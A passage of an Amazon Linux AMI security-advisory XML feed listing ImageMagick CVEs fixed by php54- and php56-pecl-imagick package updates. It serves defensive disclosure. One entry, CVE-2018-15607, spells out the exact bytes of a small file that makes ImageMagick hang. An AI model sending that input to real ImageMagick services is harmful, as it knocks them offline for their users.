release="2.51.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.252.b09-2.51.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.252.b09-2.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1810</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1810: medium priority package update for php54-pecl-imagick</title><issued date="2023-08-21 12:14:00" /><updated date="2023-08-23 02:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9956:
In ImageMagick 7.0.8-35 Q16, there is a stack-based buffer overflow in the function PopHexPixel of coders/ps.c, which allows an attacker to cause a denial of service or code execution via a crafted image file.
CVE-2019-7398:
In ImageMagick before 7.0.8-25, a memory leak exists in WriteDIBImage in coders/dib.c.
CVE-2019-7397:
In ImageMagick before 7.0.8-25 and GraphicsMagick through 1.3.31, several memory leaks exist in WritePDFImage in coders/pdf.c.
CVE-2019-7175:
In ImageMagick before 7.0.8-25, some memory leaks exist in DecodeImage in coders/pcd.c.
CVE-2019-19949:
An out-of-bounds read was discovered in ImageMagick when writing PNG images. An attacker may abuse this flaw to trick a victim user into downloading a malicious image file and running it through ImageMagick, causing the application to crash.
CVE-2019-19948:
A heap-based buffer overflow flaw was discovered in ImageMagick when writing SGI images with improper columns and rows properties. An attacker may trick a victim user into downloading a malicious image file and running it through ImageMagick, possibly executing code onto the victim user's system.
CVE-2019-17541:
ImageMagick before 7.0.8-55 has a use-after-free in DestroyStringInfo in MagickCore/string.c because the error manager is mishandled in coders/jpeg.c.
CVE-2019-17540:
ImageMagick before 7.0.8-54 has a heap-based buffer overflow in ReadPSInfo in coders/ps.c.
CVE-2019-16713:
ImageMagick 7.0.8-43 has a memory leak in coders/dot.c, as demonstrated by PingImage in MagickCore/constitute.c.
CVE-2019-16712:
ImageMagick 7.0.8-43 has a memory leak in Huffman2DEncodeImage in coders/ps3.c, as demonstrated by WritePS3Image.
CVE-2019-16711:
ImageMagick 7.0.8-40 has a memory leak in Huffman2DEncodeImage in coders/ps2.c.
CVE-2019-16710:
ImageMagick 7.0.8-35 has a memory leak in coders/dot.c, as demonstrated by AcquireMagickMemory in MagickCore/memory.c.
CVE-2019-16709:
ImageMagick 7.0.8-35 has a memory leak in coders/dps.c, as demonstrated by XCreateImage.
CVE-2019-16708:
ImageMagick 7.0.8-35 has a memory leak in magick/xwindow.c, related to XCreateImage.
CVE-2019-15141:
WriteTIFFImage in coders/tiff.c in ImageMagick 7.0.8-43 Q16 allows attackers to cause a denial-of-service (application crash resulting from a heap-based buffer over-read) via a crafted TIFF image file, related to TIFFRewriteDirectory, TIFFWriteDirectory, TIFFWriteDirectorySec, and TIFFWriteDirectoryTagColormap in tif_dirwrite.c of LibTIFF. NOTE: this occurs because of an incomplete fix for CVE-2019-11597.
CVE-2019-15140:
coders/mat.c in ImageMagick 7.0.8-43 Q16 allows remote attackers to cause a denial of service (use-after-free and application crash) or possibly have unspecified other impact by crafting a Matlab image file that is mishandled in ReadImage in MagickCore/constitute.c.
CVE-2019-15139:
The XWD image (X Window System window dumping file) parsing component in ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (application crash resulting from an out-of-bounds Read) in ReadXWDImage in coders/xwd.c by crafting a corrupted XWD image file, a different vulnerability than CVE-2019-11472.
CVE-2019-14981:
In ImageMagick 7.x before 7.0.8-41 and 6.x before 6.9.10-41, there is a divide-by-zero vulnerability in the MeanShiftImage function. It allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-14980:
In ImageMagick 7.x before 7.0.8-42 and 6.x before 6.9.10-42, there is a use after free vulnerability in the UnmapBlob function that allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-13454:
ImageMagick 7.0.8-54 Q16 allows Division by Zero in RemoveDuplicateLayers in MagickCore/layer.c.
CVE-2019-13311:
A flaw was found in ImageMagick, containing memory leaks of AcquireMagickMemory due to a wand/mogrify.c error. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash.
CVE-2019-13310:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to an error found in MagickWand/mogrify.c. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13309:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to the mishandling of the NoSuchImage error in CLIListOperatorImages in MagickWand/operation.c. It was discovered that ImageMagick does not properly release acquired memory in function MogrifyImageList() when some error conditions are met, or the "compare" option is used. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13307:
A heap-based buffer overflow was discovered in ImageMagick in the way it parses images when using the evaluate-sequence option. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13306:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13305:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced strncpy and off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13304:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced assignment. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13301:
ImageMagick 7.0.8-50 Q16 has memory leaks in AcquireMagickMemory because of an AnnotateImage error.
CVE-2019-13300:
A heap-based buffer overflow was discovered in ImageMagick in the way it applies a value with arithmetic, relational, or logical operators to an image due to mishandling columns. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13297:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood due to a height of zero mishandle error. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13295:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood due to a width of zero mishandle error. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13135:
ImageMagick before 7.0.8-50 has a "use of uninitialized value" vulnerability in the function ReadCUTImage in coders/cut.c.
CVE-2019-13134:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadVIFFImage in coders/viff.c.
CVE-2019-13133:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadBMPImage in coders/bmp.c.
CVE-2019-12979:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the SyncImageSettings function in MagickCore/image.c. This is related to AcquireImage in magick/image.c.
CVE-2019-12978:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the ReadPANGOImage function in coders/pango.c.
CVE-2019-12976:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the ReadPCLImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash.
An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-12975:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the WriteDPXImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-12974:
A NULL pointer dereference in the function ReadPANGOImage in coders/pango.c and the function ReadVIDImage in coders/vid.c in ImageMagick 7.0.8-34 allows remote attackers to cause a denial of service via a crafted image.
CVE-2019-11598:
In ImageMagick 7.0.8-40 Q16, there is a heap-based buffer over-read in the function WritePNMImage of coders/pnm.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file. This is related to SetGrayscaleImage in MagickCore/quantize.c.
CVE-2019-11597:
In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file.
CVE-2019-11472:
ReadXWDImage in coders/xwd.c in the XWD image parsing component of ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (divide-by-zero error) by crafting an XWD image file in which the header indicates neither LSB first nor MSB first.
CVE-2019-11470:
The cineon parsing component in ImageMagick 7.0.8-26 Q16 allows attackers to cause a denial-of-service (uncontrolled resource consumption) by crafting a Cineon image with an incorrect claimed image size. This occurs because ReadCINImage in coders/cin.c lacks a check for insufficient image data in a file.
CVE-2019-10650:
In ImageMagick 7.0.8-36 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or information disclosure via a crafted image file.
CVE-2019-10131:
An off-by-one read vulnerability was discovered in ImageMagick in the formatIPTCfromBuffer function in coders/meta.c. A local attacker may use this flaw to read beyond the end of the buffer or to crash the program.
CVE-2018-9133:
ImageMagick 7.0.7-26 Q16 has excessive iteration in the DecodeLabImage and EncodeLabImage functions (coders/tiff.c), which results in a hang (tens of minutes) with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted tiff file.
CVE-2018-8804:
WriteEPTImage in coders/ept.c in ImageMagick 7.0.7-25 Q16 allows remote attackers to cause a denial of service (MagickCore/memory.c double free and application crash) or possibly have unspecified other impact via a crafted file.
CVE-2018-20467:
In coders/bmp.c in ImageMagick before 7.0.8-16, an input file can result in an infinite loop and hang, with high CPU and memory consumption. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-18544:
There is a memory leak in the function WriteMSLImage of coders/msl.c in ImageMagick 7.0.8-13 Q16, and the function ProcessMSLScript of coders/msl.c in GraphicsMagick before 1.3.31.
CVE-2018-16750:
In ImageMagick 7.0.7-29 and earlier, a memory leak in the formatIPTCfromBuffer function in coders/meta.c was found.
CVE-2018-16749:
In ImageMagick 7.0.7-29 and earlier, a missing NULL check in ReadOneJNGImage in coders/png.c allows an attacker to cause a denial of service (WriteBlob assertion failure and application exit) via a crafted file.
CVE-2018-16328:
In ImageMagick before 7.0.8-8, a NULL pointer dereference exists in the CheckEventLogging function in MagickCore/log.c.
CVE-2018-15607:
In ImageMagick 7.0.8-11 Q16, a tiny input file 0x50 0x36 0x36 0x36 0x36 0x4c 0x36 0x38 0x36 0x36 0x36 0x36 0x36 0x36 0x1f 0x35 0x50 0x00 can result in a hang of several minutes during which CPU and memory resources are consumed until ultimately an attempted large memory allocation fails. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-14437:
ImageMagick 7.0.8-4 has a memory leak in parse8BIM in coders/meta.c.
CVE-2018-14436:
ImageMagick 7.0.8-4 has a memory leak in ReadMIFFImage in coders/miff.c.
CVE-2018-14435:
ImageMagick 7.0.8-4 has a memory leak in DecodeImage in coders/pcd.c.
CVE-2018-14434:
ImageMagick 7.0.8-4 has a memory leak for a colormap in WriteMPCImage in coders/mpc.c.
CVE-2018-13153:
A memory leak was discovered in ImageMagick in the XMagickCommand function in animate.c file. An array of strings, named filelist, is allocated on the heap but not released in case the function ExpandFilenames returns an error code.
CVE-2018-12600:
In ImageMagick 7.0.8-3 Q16, ReadDIBImage and WriteDIBImage in coders/dib.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-12599:
In ImageMagick 7.0.8-3 Q16, ReadBMPImage and WriteBMPImage in coders/bmp.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-11656:
In ImageMagick 7.0.7-20 Q16 x86_64, a memory leak vulnerability was found in the function ReadDCMImage in coders/dcm.c, which allows attackers to cause a denial of service via a crafted DCM image file.
CVE-2018-10805:
ImageMagick version 7.0.7-28 contains a memory leak in ReadYCBCRImage in coders/ycbcr.c.
CVE-2018-10804:
ImageMagick version 7.0.7-28 contains a memory leak in WriteTIFFImage in coders/tiff.c.
CVE-2018-10177:
An infinite loop has been found in the way ImageMagick reads Multiple-image Network Graphics (MNG) data. An attacker could exploit this to cause a denial of service via crafted MNG file.
CVE-2017-18273:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadTXTImage in coders/txt.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted image file that is mishandled in a GetImageIndexInList call.
CVE-2017-18271:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadMIFFImage in coders/miff.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted MIFF image file.
CVE-2017-18254:
A memory leak vulnerability has been discovered in ImageMagick in the WriteGIFImage function of coders/gif.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-18252:
An issue was discovered in ImageMagick 7.0.7. The MogrifyImageList function in MagickWand/mogrify.c allows attackers to cause a denial of service (assertion failure and application exit in ReplaceImageInList) via a crafted file.
CVE-2017-18251:
A memory leak vulnerability has been discovered in ImageMagick in the ReadPCDImage function of coders/pcd.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-12806:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function format8BIM, which allows attackers to cause a denial of service.
CVE-2017-12805:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function ReadTIFFImage, which allows attackers to cause a denial of service.
CVE-2017-11166:
The ReadXWDImage function in coders\xwd.c in ImageMagick 7.0.5-6 has a memory leak vulnerability that can cause memory exhaustion via a crafted length (number of color-map entries) field in the header of an XWD file.
CVE-2017-1000476:
ImageMagick 7.0.7-12 Q16, a CPU exhaustion vulnerability was found in the function ReadDDSInfo in coders/dds.c, which allows attackers to cause a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000476" title="" id="CVE-2017-1000476" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11166" title="" id="CVE-2017-11166" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12805" title="" id="CVE-2017-12805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12806" title="" id="CVE-2017-12806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18251" title="" id="CVE-2017-18251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18252" title="" id="CVE-2017-18252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18254" title="" id="CVE-2017-18254" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18271" title="" id="CVE-2017-18271" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18273" title="" id="CVE-2017-18273" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10177" title="" id="CVE-2018-10177" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10804" title="" id="CVE-2018-10804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10805" title="" id="CVE-2018-10805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11656" title="" id="CVE-2018-11656" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12599" title="" id="CVE-2018-12599" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12600" title="" id="CVE-2018-12600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13153" title="" id="CVE-2018-13153" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14434" title="" id="CVE-2018-14434" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14435" title="" id="CVE-2018-14435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14436" title="" id="CVE-2018-14436" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14437" title="" id="CVE-2018-14437" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15607" title="" id="CVE-2018-15607" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16328" title="" id="CVE-2018-16328" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16749" title="" id="CVE-2018-16749" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16750" title="" id="CVE-2018-16750" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18544" title="" id="CVE-2018-18544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20467" title="" id="CVE-2018-20467" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8804" title="" id="CVE-2018-8804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9133" title="" id="CVE-2018-9133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10131" title="" id="CVE-2019-10131" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10650" title="" id="CVE-2019-10650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" title="" id="CVE-2019-11470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" title="" id="CVE-2019-11472" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" title="" id="CVE-2019-11597" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" title="" id="CVE-2019-11598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" title="" id="CVE-2019-12974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" title="" id="CVE-2019-12975" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" title="" id="CVE-2019-12976" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" title="" id="CVE-2019-12978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" title="" id="CVE-2019-12979" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13133" title="" id="CVE-2019-13133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13134" title="" id="CVE-2019-13134" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" title="" id="CVE-2019-13135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" title="" id="CVE-2019-13295" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" title="" id="CVE-2019-13297" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" title="" id="CVE-2019-13300" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" title="" id="CVE-2019-13301" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" title="" id="CVE-2019-13304" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" title="" id="CVE-2019-13305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" title="" id="CVE-2019-13306" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" title="" id="CVE-2019-13307" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" title="" id="CVE-2019-13309" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13310" title="" id="CVE-2019-13310" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" title="" id="CVE-2019-13311" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" title="" id="CVE-2019-13454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14980" title="" id="CVE-2019-14980" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" title="" id="CVE-2019-14981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" title="" id="CVE-2019-15139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" title="" id="CVE-2019-15140" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15141" title="" id="CVE-2019-15141" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" title="" id="CVE-2019-16708" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16709" title="" id="CVE-2019-16709" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" title="" id="CVE-2019-16710" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" title="" id="CVE-2019-16711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" title="" id="CVE-2019-16712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" title="" id="CVE-2019-16713" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17540" title="" id="CVE-2019-17540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17541" title="" id="CVE-2019-17541" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" title="" id="CVE-2019-19948" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" title="" id="CVE-2019-19949" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" title="" id="CVE-2019-7175" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" title="" id="CVE-2019-7397" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" title="" id="CVE-2019-7398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9956" title="" id="CVE-2019-9956" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-pecl-imagick" version="3.4.4" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pecl-imagick-3.4.4-2.11.amzn1.x86_64.rpm</filename></package><package name="php54-pecl-imagick-debuginfo" version="3.4.4" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pecl-imagick-debuginfo-3.4.4-2.11.amzn1.x86_64.rpm</filename></package><package name="php54-pecl-imagick-debuginfo" version="3.4.4" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pecl-imagick-debuginfo-3.4.4-2.11.amzn1.i686.rpm</filename></package><package name="php54-pecl-imagick" version="3.4.4" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pecl-imagick-3.4.4-2.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1811</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1811: medium priority package update for php56-pecl-imagick</title><issued date="2023-08-21 12:14:00" /><updated date="2023-08-23 02:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9956:
In ImageMagick 7.0.8-35 Q16, there is a stack-based buffer overflow in the function PopHexPixel of coders/ps.c, which allows an attacker to cause a denial of service or code execution via a crafted image file.
CVE-2019-7398:
In ImageMagick before 7.0.8-25, a memory leak exists in WriteDIBImage in coders/dib.c.
CVE-2019-7397:
In ImageMagick before 7.0.8-25 and GraphicsMagick through 1.3.31, several memory leaks exist in WritePDFImage in coders/pdf.c.
CVE-2019-7175:
In ImageMagick before 7.0.8-25, some memory leaks exist in DecodeImage in coders/pcd.c.
CVE-2019-19949:
An out-of-bounds read was discovered in ImageMagick when writing PNG images. An attacker may abuse this flaw to trick a victim user into downloading a malicious image file and running it through ImageMagick, causing the application to crash.
CVE-2019-19948:
A heap-based buffer overflow flaw was discovered in ImageMagick when writing SGI images with improper columns and rows properties. An attacker may trick a victim user into downloading a malicious image file and running it through ImageMagick, possibly executing code onto the victim user's system.
CVE-2019-17541:
ImageMagick before 7.0.8-55 has a use-after-free in DestroyStringInfo in MagickCore/string.c because the error manager is mishandled in coders/jpeg.c.
CVE-2019-17540:
ImageMagick before 7.0.8-54 has a heap-based buffer overflow in ReadPSInfo in coders/ps.c.
CVE-2019-16713:
ImageMagick 7.0.8-43 has a memory leak in coders/dot.c, as demonstrated by PingImage in MagickCore/constitute.c.
CVE-2019-16712:
ImageMagick 7.0.8-43 has a memory leak in Huffman2DEncodeImage in coders/ps3.c, as demonstrated by WritePS3Image.
CVE-2019-16711:
ImageMagick 7.0.8-40 has a memory leak in Huffman2DEncodeImage in coders/ps2.c.
CVE-2019-16710:
ImageMagick 7.0.8-35 has a memory leak in coders/dot.c, as demonstrated by AcquireMagickMemory in MagickCore/memory.c.
CVE-2019-16709:
ImageMagick 7.0.8-35 has a memory leak in coders/dps.c, as demonstrated by XCreateImage.
CVE-2019-16708:
ImageMagick 7.0.8-35 has a memory leak in magick/xwindow.c, related to XCreateImage.
CVE-2019-15141:
WriteTIFFImage in coders/tiff.c in ImageMagick 7.0.8-43 Q16 allows attackers to cause a denial-of-service (application crash resulting from a heap-based buffer over-read) via a crafted TIFF image file, related to TIFFRewriteDirectory, TIFFWriteDirectory, TIFFWriteDirectorySec, and TIFFWriteDirectoryTagColormap in tif_dirwrite.c of LibTIFF. NOTE: this occurs because of an incomplete fix for CVE-2019-11597.
CVE-2019-15140:
coders/mat.c in ImageMagick 7.0.8-43 Q16 allows remote attackers to cause a denial of service (use-after-free and application crash) or possibly have unspecified other impact by crafting a Matlab image file that is mishandled in ReadImage in MagickCore/constitute.c.
CVE-2019-15139:
The XWD image (X Window System window dumping file) parsing component in ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (application crash resulting from an out-of-bounds Read) in ReadXWDImage in coders/xwd.c by crafting a corrupted XWD image file, a different vulnerability than CVE-2019-11472.
CVE-2019-14981:
In ImageMagick 7.x before 7.0.8-41 and 6.x before 6.9.10-41, there is a divide-by-zero vulnerability in the MeanShiftImage function. It allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-14980:
In ImageMagick 7.x before 7.0.8-42 and 6.x before 6.9.10-42, there is a use after free vulnerability in the UnmapBlob function that allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-13454:
ImageMagick 7.0.8-54 Q16 allows Division by Zero in RemoveDuplicateLayers in MagickCore/layer.c.
CVE-2019-13311:
A flaw was found in ImageMagick, containing memory leaks of AcquireMagickMemory due to a wand/mogrify.c error. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash.
CVE-2019-13310:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to an error found in MagickWand/mogrify.c. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13309:
